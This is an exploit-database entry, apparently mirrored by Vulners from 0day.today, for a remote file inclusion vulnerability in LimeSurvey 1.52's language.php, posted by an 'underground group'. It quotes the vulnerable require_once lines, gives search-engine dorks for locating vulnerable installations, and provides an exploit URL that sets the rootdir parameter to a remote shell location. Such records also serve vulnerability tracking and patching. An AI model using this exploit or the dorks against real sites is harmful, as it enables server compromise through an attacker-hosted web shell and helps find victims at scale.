Lucene search
LimeSurvey <= 1.52 (language.php) Remote File Inclusion Vulnerability
LimeSurvey 1.52 Remote File Inclusion Vulnerabilit
Show more
=====================================================================
LimeSurvey <= 1.52 (language.php) Remote File Inclusion Vulnerability
=====================================================================
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : LimeSurvey (PHPSurveyor) 1.52 plus_build 2007.10.16
Download : http://garr.dl.sourceforge.net/sourceforge/limesurvey/limesurvey152plus_build3386_20071016.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
Dork : "You have not provided a survey identification number"
Dork2 : "LimeSurvey"
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
require_once($rootdir.'/classes/php-gettext/gettext.php');
require_once($rootdir.'/classes/php-gettext/streams.php');
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/classes/core/language.php?rootdir=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
# 0day.today [2018-04-09] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo17 Oct 2007 00:00Current
7.1High risk
Vulners AI Score7.1